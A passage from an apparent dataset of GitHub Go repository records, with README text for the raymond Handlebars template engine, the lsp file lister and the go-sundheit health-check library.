lastName\n})\n```\n\n\n### Built-In Helpers\n\nThose built-in helpers are available to all templates.\n\n\n#### The `if` block helper\n\nYou can use the `if` helper to conditionally render a block. If its argument returns `false`, `nil`, `0`, `\"\"`, an empty array, an empty slice or an empty map, then raymond will not render the block.\n\n```html\n
\n {{#if author}}\n

{{firstName}} {{lastName}}

\n {{/if}}\n
\n```\n\nWhen using a block expression, you can specify a template section to run if the expression returns a falsy value. That section, marked by `{{else}}` is called an \"else section\".\n\n```html\n
\n {{#if author}}\n

{{firstName}} {{lastName}}

\n {{else}}\n

Unknown Author

\n {{/if}}\n
\n```\n\nYou can chain several blocks. For example that template:\n\n```html\n{{#if isActive}}\n \"Active\"\n{{else if isInactive}}\n \"Inactive\"\n{{else}}\n \"Unknown\"\n{{/if}}\n```\n\nWith that context:\n\n```go\nctx := map[string]interface{}{\n \"isActive\": false,\n \"isInactive\": false,\n}\n```\n\nOutputs:\n\n```html\n \"Unknown\"\n```\n\n\n#### The `unless` block helper\n\nYou can use the `unless` helper as the inverse of the `if` helper. Its block will be rendered if the expression returns a falsy value.\n\n```html\n
\n {{#unless license}}\n

WARNING: This entry does not have a license!

\n {{/unless}}\n
\n```\n\n\n#### The `each` block helper\n\nYou can iterate over an array, a slice, a map or a struct instance using this built-in `each` helper. Inside the block, you can use `this` to reference the element being iterated over.\n\nFor example:\n\n```html\n
    \n {{#each people}}\n
  • {{this}}
  • \n {{/each}}\n
\n```\n\nWith this context:\n\n```go\nmap[string]interface{}{\n \"people\": []string{\n \"Marcel\", \"Jean-Claude\", \"Yvette\",\n },\n}\n```\n\nOutputs:\n\n```html\n
    \n
  • Marcel
  • \n
  • Jean-Claude
  • \n
  • Yvette
  • \n
\n```\n\nYou can optionally provide an `{{else}}` section which will display only when the passed argument is an empty array, an empty slice or an empty map (a `struct` instance is never considered empty).\n\n```html\n{{#each paragraphs}}\n

{{this}}

\n{{else}}\n

No content

\n{{/each}}\n```\n\nWhen looping through items in `each`, you can optionally reference the current loop index via `{{@index}}`.\n\n```html\n{{#each array}}\n {{@index}}: {{this}}\n{{/each}}\n```\n\nAdditionally for map and struct instance iteration, `{{@key}}` references the current map key or struct field name:\n\n```html\n{{#each map}}\n {{@key}}: {{this}}\n{{/each}}\n```\n\nThe first and last steps of iteration are noted via the `@first` and `@last` variables.\n\n\n#### The `with` block helper\n\nYou can shift the context for a section of a template by using the built-in `with` block helper.\n\n```html\n
\n

{{title}}

\n\n {{#with author}}\n

By {{firstName}} {{lastName}}

\n {{/with}}\n
\n```\n\nWith this context:\n\n```go\nmap[string]interface{}{\n \"title\": \"My first post!\",\n \"author\": map[string]string{\n \"firstName\": \"Jean\",\n \"lastName\": \"Valjean\",\n },\n}\n```\n\nOutputs:\n\n```html\n
\n

My first post!

\n\n

By Jean Valjean

\n
\n```\n\nYou can optionally provide an `{{else}}` section which will display only when the passed argument is falsy.\n\n```html\n{{#with author}}\n

{{name}}

\n{{else}}\n

No content

\n{{/with}}\n```\n\n\n#### The `lookup` helper\n\nThe `lookup` helper allows for dynamic parameter resolution using handlebars variables.\n\n```html\n{{#each bar}}\n {{lookup ../foo @index}}\n{{/each}}\n```\n\n\n#### The `log` helper\n\nThe `log` helper allows for logging while rendering a template.\n\n```html\n{{log \"Look at me!\"}}\n```\n\nNote that the handlebars.js `@level` variable is not supported.\n\n\n#### The `equal` helper\n\nThe `equal` helper renders a block if the string version of both arguments are equals.\n\nFor example that template:\n\n```html\n{{#equal foo \"bar\"}}foo is bar{{/equal}}\n{{#equal foo baz}}foo is the same as baz{{/equal}}\n{{#equal nb 0}}nothing{{/equal}}\n{{#equal nb 1}}there is one{{/equal}}\n{{#equal nb \"1\"}}everything is stringified before comparison{{/equal}}\n```\n\nWith that context:\n\n```go\nctx := map[string]interface{}{\n \"foo\": \"bar\",\n \"baz\": \"bar\",\n \"nb\": 1,\n}\n```\n\nOutputs:\n\n```html\nfoo is bar\nfoo is the same as baz\n\nthere is one\neverything is stringified before comparison\n```\n\n\n### Block Helpers\n\nBlock helpers make it possible to define custom iterators and other functionality that can invoke the passed block with a new context.\n\n\n#### Block Evaluation\n\nAs an example, let's define a block helper that adds some markup to the wrapped text.\n\n```html\n
\n

{{title}}

\n
\n {{#bold}}{{body}}{{/bold}}\n
\n
\n```\n\nThe `bold` helper will add markup to make its text bold.\n\n```go\nraymond.RegisterHelper(\"bold\", func(options *raymond.Options) raymond.SafeString {\n return raymond.SafeString(`
` + options.Fn() + \"
\")\n})\n```\n\nA helper evaluates the block content with current context by calling `options.Fn()`.\n\nIf you want to evaluate the block with another context, then use `options.FnWith(ctx)`, like this french version of built-in `with` block helper:\n\n```go\nraymond.RegisterHelper(\"avec\", func(context interface{}, options *raymond.Options) string {\n return options.FnWith(context)\n})\n```\n\nWith that template:\n\n```html\n{{#avec obj.text}}{{this}}{{/avec}}\n```\n\n\n#### Conditional\n\nLet's write a french version of `if` block helper:\n\n```go\nsource := `{{#si yep}}YEP !{{/si}}`\n\nctx := map[string]interface{}{\"yep\": true}\n\nraymond.RegisterHelper(\"si\", func(conditional bool, options *raymond.Options) string {\n if conditional {\n return options.Fn()\n }\n return \"\"\n})\n```\n\nNote that as the first parameter of the helper is typed as `bool` an automatic conversion is made if corresponding context value is not a boolean. So this helper works with that context too:\n\n```go\nctx := map[string]interface{}{\"yep\": \"message\"}\n```\n\nHere, `\"message\"` is converted to `true` because it is an non-empty string. See `IsTrue()` function for more informations on boolean conversion.\n\n\n#### Else Block Evaluation\n\nWe can enhance the `si` block helper to evaluate the `else block` by calling `options.Inverse()` if conditional is false:\n\n```go\nsource := `{{#si yep}}YEP !{{else}}NOP !{{/si}}`\n\nctx := map[string]interface{}{\"yep\": false}\n\nraymond.RegisterHelper(\"si\", func(conditional bool, options *raymond.Options) string {\n if conditional {\n return options.Fn()\n }\n return options.Inverse()\n})\n```\n\nOutputs:\n```\nNOP !\n```\n\n\n#### Block Parameters\n\nIt's possible to receive named parameters from supporting helpers.\n\n```html\n{{#each users as |user userId|}}\n Id: {{userId}} Name: {{user.name}}\n{{/each}}\n```\n\nIn this particular example, `user` will have the same value as the current context and `userId` will have the index/key value for the iteration.\n\nThis allows for nested helpers to avoid name conflicts.\n\nFor example:\n\n```html\n{{#each users as |user userId|}}\n {{#each user.books as |book bookId|}}\n User: {{userId}} Book: {{bookId}}\n {{/each}}\n{{/each}}\n```\n\nWith this context:\n\n```go\nctx := map[string]interface{}{\n \"users\": map[string]interface{}{\n \"marcel\": map[string]interface{}{\n \"books\": map[string]interface{}{\n \"book1\": \"My first book\",\n \"book2\": \"My second book\",\n },\n },\n \"didier\": map[string]interface{}{\n \"books\": map[string]interface{}{\n \"bookA\": \"Good book\",\n \"bookB\": \"Bad book\",\n },\n },\n },\n}\n```\n\nOutputs:\n\n```html\n User: marcel Book: book1\n User: marcel Book: book2\n User: didier Book: bookA\n User: didier Book: bookB\n```\n\nAs you can see, the second block parameter is the map key. When using structs, it is the struct field name.\n\nWhen using arrays and slices, the second parameter is element index:\n\n```go\nctx := map[string]interface{}{\n \"users\": []map[string]interface{}{\n {\n \"id\": \"marcel\",\n \"books\": []map[string]interface{}{\n {\"id\": \"book1\", \"title\": \"My first book\"},\n {\"id\": \"book2\", \"title\": \"My second book\"},\n },\n },\n {\n \"id\": \"didier\",\n \"books\": []map[string]interface{}{\n {\"id\": \"bookA\", \"title\": \"Good book\"},\n {\"id\": \"bookB\", \"title\": \"Bad book\"},\n },\n },\n },\n}\n```\n\nOutputs:\n\n```html\n User: 0 Book: 0\n User: 0 Book: 1\n User: 1 Book: 0\n User: 1 Book: 1\n```\n\n\n### Helper Parameters\n\nWhen calling a helper in a template, raymond expects the same number of arguments as the number of helper function parameters.\n\nSo this template:\n\n```html\n{{add a}}\n```\n\nWith this helper:\n\n```go\nraymond.RegisterHelper(\"add\", func(val1, val2 int) string {\n return strconv.Itoa(val1 + val2)\n})\n```\n\nWill simply panics, because we call the helper with one argument whereas it expects two.\n\n\n#### Automatic conversion\n\nLet's create a `concat` helper that expects two strings and concat them:\n\n```go\nsource := `{{concat a b}}`\n\nctx := map[string]interface{}{\n \"a\": \"Jean\",\n \"b\": \"Valjean\",\n}\n\nraymond.RegisterHelper(\"concat\", func(val1, val2 string) string {\n return val1 + \" \" + val2\n})\n```\n\nEverything goes well, two strings are passed as arguments to the helper that outputs:\n\n```html\nJean VALJEAN\n```\n\nBut what happens if there is another type than `string` in the context ? For example:\n\n```go\nctx := map[string]interface{}{\n \"a\": 10,\n \"b\": \"Valjean\",\n}\n```\n\nActually, raymond perfoms automatic string conversion. So because the first parameter of the helper is typed as `string`, the first argument will be converted from the `10` integer to `\"10\"`, and the helper outputs:\n\n```html\n10 VALJEAN\n```\n\nNote that this kind of automatic conversion is done with `bool` type too, thanks to the `IsTrue()` function.\n\n\n### Options Argument\n\nIf a helper needs the `Options` argument, just add it at the end of helper parameters:\n\n```go\nraymond.RegisterHelper(\"add\", func(val1, val2 int, options *raymond.Options) string {\n return strconv.Itoa(val1 + val2) + \" \" + options.ValueStr(\"bananas\")\n})\n```\n\nThanks to the `options` argument, helpers have access to the current evaluation context, to the `Hash` arguments, and they can manipulate the private data variables.\n\nThe `Options` argument is even necessary for Block Helpers to evaluate block and \"else block\".\n\n\n#### Context Values\n\nHelpers fetch current context values with `options.Value()` and `options.ValuesStr()`.\n\n`Value()` returns an `interface{}` and lets the helper do the type assertions whereas `ValueStr()` automatically converts the value to a `string`.\n\nFor example:\n\n```go\nsource := `{{concat a b}}`\n\nctx := map[string]interface{}{\n \"a\": \"Marcel\",\n \"b\": \"Beliveau\",\n \"suffix\": \"FOREVER !\",\n}\n\nraymond.RegisterHelper(\"concat\", func(val1, val2 string, options *raymond.Options) string {\n return val1 + \" \" + val2 + \" \" + options.ValueStr(\"suffix\")\n})\n```\n\nOutputs:\n\n```html\nMarcel Beliveau FOREVER !\n```\n\nHelpers can get the entire current context with `options.Ctx()` that returns an `interface{}`.\n\n\n#### Helper Hash Arguments\n\nHelpers access hash arguments with `options.HashProp()` and `options.HashStr()`.\n\n`HashProp()` returns an `interface{}` and lets the helper do the type assertions whereas `HashStr()` automatically converts the value to a `string`.\n\nFor example:\n\n```go\nsource := `{{concat suffix first=a second=b}}`\n\nctx := map[string]interface{}{\n \"a\": \"Marcel\",\n \"b\": \"Beliveau\",\n \"suffix\": \"FOREVER !\",\n}\n\nraymond.RegisterHelper(\"concat\", func(suffix string, options *raymond.Options) string {\n return options.HashStr(\"first\") + \" \" + options.HashStr(\"second\") + \" \" + suffix\n})\n```\n\nOutputs:\n\n```html\nMarcel Beliveau FOREVER !\n```\n\nHelpers can get the full hash with `options.Hash()` that returns a `map[string]interface{}`.\n\n\n#### Private Data\n\nHelpers access private data variables with `options.Data()` and `options.DataStr()`.\n\n`Data()` returns an `interface{}` and lets the helper do the type assertions whereas `DataStr()` automatically converts the value to a `string`.\n\nHelpers can get the entire current data frame with `options.DataFrame()` that returns a `*DataFrame`.\n\nFor helpers that need to inject their own private data frame, use `options.NewDataFrame()` to create the frame and `options.FnData()` to evaluate the block with that frame.\n\nFor example:\n\n```go\nsource := `{{#voodoo kind=a}}Voodoo is {{@magix}}{{/voodoo}}`\n\nctx := map[string]interface{}{\n \"a\": \"awesome\",\n}\n\nraymond.RegisterHelper(\"voodoo\", func(options *raymond.Options) string {\n // create data frame with @magix data\n frame := options.NewDataFrame()\n frame.Set(\"magix\", options.HashProp(\"kind\"))\n\n // evaluates block with new data frame\n return options.FnData(frame)\n})\n```\n\nHelpers that need to evaluate the block with a private data frame and a new context can call `options.FnCtxData()`.\n\n\n### Utilites\n\nIn addition to `Escape()`, raymond provides utility functions that can be usefull for helpers.\n\n\n#### `Str()`\n\n`Str()` converts its parameter to a `string`.\n\nBooleans:\n\n```go\nraymond.Str(3) + \" foos and \" + raymond.Str(-1.25) + \" bars\"\n// Outputs: \"3 foos and -1.25 bars\"\n```\n\nNumbers:\n\n``` go\n\"everything is \" + raymond.Str(true) + \" and nothing is \" + raymond.Str(false)\n// Outputs: \"everything is true and nothing is false\"\n```\n\nMaps:\n\n```go\nraymond.Str(map[string]string{\"foo\": \"bar\"})\n// Outputs: \"map[foo:bar]\"\n```\n\nArrays and Slices:\n\n```go\nraymond.Str([]interface{}{true, 10, \"foo\", 5, \"bar\"})\n// Outputs: \"true10foo5bar\"\n```\n\n\n#### `IsTrue()`\n\n`IsTrue()` returns the truthy version of its parameter.\n\nIt returns `false` when parameter is either:\n\n - an empty array\n - an empty slice\n - an empty map\n - `\"\"`\n - `nil`\n - `0`\n - `false`\n\nFor all others values, `IsTrue()` returns `true`.\n\n\n## Context Functions\n\nIn addition to helpers, lambdas found in context are evaluated.\n\nFor example, that template and context:\n\n```go\nsource := \"I {{feeling}} you\"\n\nctx := map[string]interface{}{\n \"feeling\": func() string {\n rand.Seed(time.Now().UTC().UnixNano())\n\n feelings := []string{\"hate\", \"love\"}\n return feelings[rand.Intn(len(feelings))]\n },\n}\n```\n\nRandomly renders `I hate you` or `I love you`.\n\nThose context functions behave like helper functions: they can be called with parameters and they can have an `Options` argument.\n\n\n## Partials\n\n### Template Partials\n\nYou can register template partials before execution:\n\n```go\ntpl := raymond.MustParse(\"{{> foo}} baz\")\ntpl.RegisterPartial(\"foo\", \"bar\")\n\nresult := tpl.MustExec(nil)\nfmt.Print(result)\n```\n\nOutput:\n\n```html\nbar baz\n```\n\nYou can register several partials at once:\n\n```go\ntpl := raymond.MustParse(\"{{> foo}} and {{> baz}}\")\ntpl.RegisterPartials(map[string]string{\n \"foo\": \"bar\",\n \"baz\": \"bat\",\n})\n\nresult := tpl.MustExec(nil)\nfmt.Print(result)\n```\n\nOutput:\n\n```html\nbar and bat\n```\n\n\n### Global Partials\n\nYou can registers global partials that will be accessible by all templates:\n\n```go\nraymond.RegisterPartial(\"foo\", \"bar\")\n\ntpl := raymond.MustParse(\"{{> foo}} baz\")\nresult := tpl.MustExec(nil)\nfmt.Print(result)\n```\n\nOr:\n\n```go\nraymond.RegisterPartials(map[string]string{\n \"foo\": \"bar\",\n \"baz\": \"bat\",\n})\n\ntpl := raymond.MustParse(\"{{> foo}} and {{> baz}}\")\nresult := tpl.MustExec(nil)\nfmt.Print(result)\n```\n\n\n### Dynamic Partials\n\nIt's possible to dynamically select the partial to be executed by using sub expression syntax.\n\nFor example, that template randomly evaluates the `foo` or `baz` partial:\n\n```go\ntpl := raymond.MustParse(\"{{> (whichPartial) }}\")\ntpl.RegisterPartials(map[string]string{\n \"foo\": \"bar\",\n \"baz\": \"bat\",\n})\n\nctx := map[string]interface{}{\n \"whichPartial\": func() string {\n rand.Seed(time.Now().UTC().UnixNano())\n\n names := []string{\"foo\", \"baz\"}\n return names[rand.Intn(len(names))]\n },\n}\n\nresult := tpl.MustExec(ctx)\nfmt.Print(result)\n```\n\n\n### Partial Contexts\n\nIt's possible to execute partials on a custom context by passing in the context to the partial call.\n\nFor example:\n\n```go\ntpl := raymond.MustParse(\"User: {{> userDetails user }}\")\ntpl.RegisterPartial(\"userDetails\", \"{{firstname}} {{lastname}}\")\n\nctx := map[string]interface{}{\n \"user\": map[string]string{\n \"firstname\": \"Jean\",\n \"lastname\": \"Valjean\",\n },\n}\n\nresult := tpl.MustExec(ctx)\nfmt.Print(result)\n```\n\nDisplays:\n\n```html\nUser: Jean Valjean\n```\n\n\n### Partial Parameters\n\nCustom data can be passed to partials through hash parameters.\n\nFor example:\n\n```go\ntpl := raymond.MustParse(\"{{> myPartial name=hero }}\")\ntpl.RegisterPartial(\"myPartial\", \"My hero is {{name}}\")\n\nctx := map[string]interface{}{\n \"hero\": \"Goldorak\",\n}\n\nresult := tpl.MustExec(ctx)\nfmt.Print(result)\n```\n\nDisplays:\n\n```html\nMy hero is Goldorak\n```\n\n\n## Utility Functions\n\nYou can use following utility fuctions to parse and register partials from files:\n\n- `ParseFile()` - reads a file and return parsed template\n- `Template.RegisterPartialFile()` - reads a file and registers its content as a partial with given name\n- `Template.RegisterPartialFiles()` - reads several files and registers them as partials, the filename base is used as the partial name\n\n\n## Mustache\n\nHandlebars is a superset of [mustache](https://mustache.github.io) but it differs on those points:\n\n- Alternative delimiters are not supported\n- There is no recursive lookup\n\n\n## Limitations\n\nThese handlebars options are currently NOT implemented:\n\n- `compat` - enables recursive field lookup\n- `knownHelpers` - list of helpers that are known to exist (truthy) at template execution time\n- `knownHelpersOnly` - allows further optimizations based on the known helpers list\n- `trackIds` - include the id names used to resolve parameters for helpers\n- `noEscape` - disables HTML escaping globally\n- `strict` - templates will throw rather than silently ignore missing fields\n- `assumeObjects` - removes object existence checks when traversing paths\n- `preventIndent` - disables the auto-indententation of nested partials\n- `stringParams` - resolves a parameter to it's name if the value isn't present in the context stack\n\nThese handlebars features are currently NOT implemented:\n\n- raw block content is not passed as a parameter to helper\n- `blockHelperMissing` - helper called when a helper can not be directly resolved\n- `helperMissing` - helper called when a potential helper expression was not found\n- `@contextPath` - value set in `trackIds` mode that records the lookup path for the current context\n- `@level` - log level\n\n\n## Handlebars Lexer\n\nYou should not use the lexer directly, but for your information here is an example:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond/lexer\"\n)\n\nfunc main() {\n source := \"You know {{nothing}} John Snow\"\n\n output := \"\"\n\n lex := lexer.Scan(source)\n for {\n // consume next token\n token := lex.NextToken()\n\n output += fmt.Sprintf(\" %s\", token)\n\n // stops when all tokens have been consumed, or on error\n if token.Kind == lexer.TokenEOF || token.Kind == lexer.TokenError {\n break\n }\n }\n\n fmt.Print(output)\n}\n```\n\nOutputs:\n\n```\nContent{\"You know \"} Open{\"{{\"} ID{\"nothing\"} Close{\"}}\"} Content{\" John Snow\"} EOF\n```\n\n\n## Handlebars Parser\n\nYou should not use the parser directly, but for your information here is an example:\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/aymerick/raymond/ast\"\n \"github.com/aymerick/raymond/parser\"\n)\n\nfu nc main() {\n source := \"You know {{nothing}} John Snow\"\n\n // parse template\n program, err := parser.Parse(source)\n if err != nil {\n panic(err)\n }\n\n // print AST\n output := ast.Print(program)\n\n fmt.Print(output)\n}\n```\n\nOutputs:\n\n```\nCONTENT[ 'You know ' ]\n{{ PATH:nothing [] }}\nCONTENT[ ' John Snow' ]\n```\n\n\n## Test\n\nFirst, fetch mustache tests:\n\n $ git submodule update --init\n\nTo run all tests:\n\n $ go test ./...\n\nTo filter tests:\n\n $ go test -run=\"Partials\"\n\nTo run all test and all benchmarks:\n\n $ go test -bench . ./...\n\nTo test with race detection:\n\n $ go test -race ./...\n\n\n## References\n\n - \n - \n - \n - \n\n\n## Others Implementations\n\n- [handlebars.js](http://handlebarsjs.com) - javascript\n- [handlebars.java](https://github.com/jknack/handlebars.java) - java\n- [handlebars.rb](https://github.com/cowboyd/handlebars.rb) - ruby\n- [handlebars.php](https://github.com/XaminProject/handlebars.php) - php\n- [handlebars-objc](https://github.com/Bertrand/handlebars-objc) - Objective C\n- [rumblebars](https://github.com/nicolas-cherel/rumblebars) - rust\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "slok/kubewebhook", "link": "https://github.com/slok/kubewebhook", "tags": ["kubernetes", "webhooks", "controller", "mutating", "validating", "admission", "k8s", "apiserver"], "stars": 512, "description": "Go framework to create Kubernetes mutating and validating webhooks", "lang": "Go", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dborzov/lsp", "link": "https://github.com/dborzov/lsp", "tags": ["ls", "filemanager", "unix"], "stars": 512, "description": "lsp is like ls command but more human-friendly", "lang": "Go", "repo_lang": "", "readme": "## lsp: list files in a mildly human-frendlier manner\n[![Build Status](https://travis-ci.org/dborzov/lsp.svg?branch=master)](https://travis-ci.org/dborzov/lsp)\n\n`lsp` lists files, like [`ls`](http://en.wikipedia.org/wiki/Ls) command,\nbut it does not attempt to meet\nthat archaic POSIX specification, so instead of this:\n```\n(bash)$ ls -l\n\ntotal 16\n-rw-r--r-- 1 peterborzov staff 1079 9 Aug 00:22 LICENSE\n-rw-r--r-- 1 peterborzov staff 60 9 Aug 00:22 README.md\n```\n\nyou get this:\n![screenshot](https://raw.githubusercontent.com/dborzov/lsp/screenshots/symlinks.png)\n\n## Features\n#### File Groups\nFiles grouped by type (with `-l` key or in modes when file type not shown). `lsp` distinguishes binary, text and executable files, symlinks and is aware of weird types like devices and unix socket thingy:\n![lsp can show files grouped by type](https://raw.githubusercontent.com/dborzov/lsp/screenshots/grouped.png)\n#### Modification time in human-friendly format\n`-t` key for when you are interested in modification time. It turns to the mode that makes most sense to me when I want to look up modtimes, sorted within file groups from recent to latest:\n![](https://raw.githubusercontent.com/dborzov/lsp/screenshots/modtime.png)\nSometimes relative times are not very readible as well (like when you are interested in a specific date), use two flags `-sl` to show the full UTC timestamp in properties.\n#### Size in human-friendly format\n`-s` key, similarly to modtime key, shows file sizes and sorts within file groups from largest to smallest:\n![](https://raw.githubusercontent.com/dborzov/lsp/screenshots/size.png)\n\n#### Async Timeout\nThe file information is collected asynchronously, BFS-like, with a separate thread for each file and a timeout threshold.\n\nThat means that the execution is not going to freeze because of some low-response device driver (like external hard drive or optical drive) or collecting info about a huge directory.\n\n#### Align by left\nI have been playing with aligning files and descriptions by center, and I like that you can see files with the same extension right away, but there are deifinitely cases when it gets weird.\nFor now, there is `-p` key to render the file table in the left-aligned columns:\n![](https://raw.githubusercontent.com/dborzov/lsp/screenshots/table.png)\n\n\n## Todo before v1.0\n- [ ] Rewrite outline formatting: with the current design too much space is wasted, long filenames break things\n- [x] Mark executable files as such\n- Think about how to represent file rights and ownership\n- Approach hidden and generated files as outlined in [issue#3](https://github.com/dborzov/lsp/issues/3)\n- Better test coverage\n- Expand in this README on philosophy of the project (tool in the unix way, minimize surprises, nothing's to be configurable)\n- Think of TODO list points\n\nGithub Issues and pull requests are very welcome, feel free to [message me](tihoutrom@gmail.com) if you are considering contributing.\nSee [CONTRIBUTING.md](CONTRIBUTING.md) for intro to the codebase\n\n\n## Installation\n\n`lsp` is written in the `go` programming language.\nIt can be installed using `go get`.\n\n```\n $ go get github.com/dborzov/lsp\n```\n\nThen make sure that your `$PATH` includes the `$GOPATH/bin` directory.\nTo do that, you can put this line your `~/.bash_profile` or `.zshrc`:\n```\nexport PATH=$PATH:$GOPATH/bin\n```\n\nOnce it becomes more functional, `lsp` will be distributed in native binaries\n(without dependencies) for all platforms (Linux, MacOS, Windows).\n\n## Misc\nMIT license.\n", "readme_type": "markdown", "hn_comments": "While I hesitate to augment core functionality with something before its untested, I do think this looks pretty awesome and is exactly what I want 'ls' to perform like. Nice work, looking forward to future versions.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AppsFlyer/go-sundheit", "link": "https://github.com/AppsFlyer/go-sundheit", "tags": [], "stars": 512, "description": "A library built to provide support for defining service health for golang services. It allows you to register async health checks for your dependencies and the service itself, provides a health endpoint that exposes their status, and health metrics.", "lang": "Go", "repo_lang": "", "readme": "# go-sundheit\n[![Actions Status](https://github.com/AppsFlyer/go-sundheit/workflows/go-build/badge.svg)](https://github.com/AppsFlyer/go-sundheit/actions)\n[![CircleCI](https://circleci.com/gh/AppsFlyer/go-sundheit.svg?style=svg)](https://circleci.com/gh/AppsFlyer/go-sundheit)\n[![Coverage Status](https://coveralls.io/repos/github/AppsFlyer/go-sundheit/badge.svg?branch=master)](https://coveralls.io/github/AppsFlyer/go-sundheit?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/AppsFlyer/go-sundheit)](https://goreportcard.com/report/github.com/AppsFlyer/go-sundheit)\n[![Godocs](https://img.shields.io/badge/golang-documentation-blue.svg)](https://godoc.org/github.com/AppsFlyer/go-sundheit)\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go) \n\n\n\nA library built to provide support for defining service health for golang services.\nIt allows you to register async health checks for your dependencies and the service itself, \nand provides a health endpoint that exposes their status.\n\n## What's go-sundheit?\nThe project is named after the German word `Gesundheit` which means \u2018health\u2019, and it is pronounced `/\u0261\u0259\u02c8z\u028ant\u02ccha\u026a\u032ft/`.\n\n## Installation\nUsing go modules:\n```\ngo get github.com/AppsFlyer/go-sundheit@v0.5.0\n```\n\n## Usage\n```go\nimport (\n\t\"net/http\"\n\t\"time\"\n\t\"log\"\n\n\t\"github.com/pkg/errors\"\n\t\"github.com/AppsFlyer/go-sundheit\"\n\n\thealthhttp \"github.com/AppsFlyer/go-sundheit/http\"\n\t\"github.com/AppsFlyer/go-sundheit/checks\"\n)\n\nfunc main() {\n\t// create a new health instance\n\th := gosundheit.New()\n\t\n\t// define an HTTP dependency check\n\thttpCheckConf := checks.HTTPCheckConfig{\n\t\tCheckName: \"httpbin.url.check\",\n\t\tTimeout: 1 * time.Second,\n\t\t// dependency you're checking - use your own URL here...\n\t\t// this URL will fail 50% of the times\n\t\tURL: \"http://httpbin.org/status/200,300\",\n\t}\n\t// create the HTTP check for the dependency\n\t// fail fast when you misconfigured the URL. Don't ignore errors!!!\n\thttpCheck, err := checks.NewHTTPCheck(httpCheckConf)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn // your call...\n\t}\n\n\t// Alternatively panic when creating a check fails\n\thttpCheck = checks.Must(checks.NewHTTPCheck(httpCheckConf))\n\n\terr = h.RegisterCheck(\n\t\thttpCheck,\n\t\tgosundheit.InitialDelay(time.Second), // the check will run once after 1 sec\n\t\tgosundheit.ExecutionPeriod(10 * time.Second), // the check will be executed every 10 sec\n\t)\n\t\n\tif err != nil {\n\t\tfmt.Println(\"Failed to register check: \", err)\n\t\treturn // or whatever\n\t}\n\n\t// define more checks...\n\t\n\t// register a health endpoint\n\thttp.Handle(\"/admin/health.json\", healthhttp.HandleHealthJSON(h))\n\t\n\t// serve HTTP\n\tlog.Fatal(http.ListenAndServe(\":8080\", nil))\n}\n```\n### Using `Option` to Configure `Health` Service\nTo create a health service, it's simple as calling the following code:\n```go\ngosundheit.New(options ...Option)\n```\nThe optional parameters of `options` allows the user to configure the Health Service by passing configuration functions (implementing `Option` signature). \nAll options are marked with the prefix `WithX`. Available options:\n- `WithCheckListeners` - enables you to act on check registration, start and completed events\n- `WithHealthListeners` - enables you to act on changes in the health service results\n\n### Built-in Checks\nThe library comes with a set of built-in checks.\nCurrently implemented checks are as follows:\n\n#### HTTP built-in check\nThe HTTP check allows you to trigger an HTTP request to one of your dependencies, \nand verify the response status, and optionally the content of the response body.\nExample was given above in the [usage](#usage) section\n\n#### DNS built-in check(s)\nThe DNS checks allow you to perform lookup to a given hostname / domain name / CNAME / etc, \nand validate that it resolves to at least the minimum number of required results.\n\nCreating a host lookup check is easy:\n```go\n// Schedule a host resolution check for `example.com`, requiring at least one results, and running every 10 sec\nh.RegisterCheck(\n\tchecks.NewHostResolveCheck(\"example.com\", 1),\n\tgosundheit.ExecutionPeriod(10 * time.Second),\n)\n```\n\nYou may also use the low level `checks.NewResolveCheck` specifying a custom `LookupFunc` if you want to to perform other kinds of lookups.\nFor example you may register a reverse DNS lookup check like so:\n```go\nfunc ReverseDNLookup(ctx context.Context, addr string) (resolvedCount int, err error) {\n\tnames, err := net.DefaultResolver.LookupAddr(ctx, addr)\n\tresolvedCount = len(names)\n\treturn\n}\n\n//...\n\nh.RegisterCheck(\n\tchecks.NewResolveCheck(ReverseDNLookup, \"127.0.0.1\", 3),\n\tgosundheit.ExecutionPeriod(10 * time.Second),\n\tgosundheit.ExecutionTimeout(1*time.Second)\n)\n```\n\n#### Ping built-in check(s)\nThe ping checks allow you to verifies that a resource is still alive and reachable.\nFor example, you can use it as a DB ping check (`sql.DB` implements the Pinger interface):\n```go\n\tdb, err := sql.Open(...)\n\tdbCheck, err := checks.NewPingCheck(\"db.check\", db)\n\t_ = h.RegisterCheck(&gosundheit.Config{\n\t\tCheck: dbCheck,\n\t\t// ...\n\t})\n```\n\nYou can also use the ping check to test a generic connection like so:\n```go\n\tpinger := checks.NewDialPinger(\"tcp\", \"example.com\")\n\tpingCheck, err := checks.NewPingCheck(\"example.com.reachable\", pinger)\n\th.RegisterCheck(pingCheck)\n``` \n\nThe `NewDialPinger` function supports all the network/address parameters supported by the `net.Dial()` function(s)\n\n### Custom Checks\nThe library provides 2 means of defining a custom check.\nThe bottom line is that you need an implementation of the `Check` interface:\n```go\n// Check is the API for defining health checks.\n// A valid check has a non empty Name() and a check (Execute()) function.\ntype Check interface {\n\t// Name is the name of the check.\n\t// Check names must be metric compatible.\n\tName() string\n\t// Execute runs a single time check, and returns an error when the check fails, and an optional details object.\n\tExecute() (details interface{}, err error)\n}\n```\nSee examples in the following 2 sections below.\n\n#### Use the CustomCheck struct\nThe `checksCustomCheck` struct implements the `checks.Check` interface,\nand is the simplest way to implement a check if all you need is to define a check function.\n\nLet's define a check function that fails 50% of the times:\n```go\nfunc lotteryCheck() (details interface{}, err error) {\n\tlottery := rand.Float32()\n\tdetails = fmt.Sprintf(\"lottery=%f\", lottery)\n\tif lottery < 0.5 {\n\t\terr = errors.New(\"Sorry, I failed\")\n\t}\n\treturn\n}\n```\n\nNow we register the check to start running right away, and execute once per 2 minutes with a timeout of 5 seconds:\n```go\nh := gosundheit.New()\n...\n\nh.RegisterCheck(\n\t&checks.CustomCheck{\n\t\tCheckName: \"lottery.check\",\n\t\tCheckFunc: lotteryCheck,\n\t},\n\tgosundheit.InitialDelay(0),\n\tgosundheit.ExecutionPeriod(2 * time.Minute), \n\tgosundheit.ExecutionTimeout(5 * time.Second)\n)\n```\n\n#### Implement the Check interface\nSometimes you 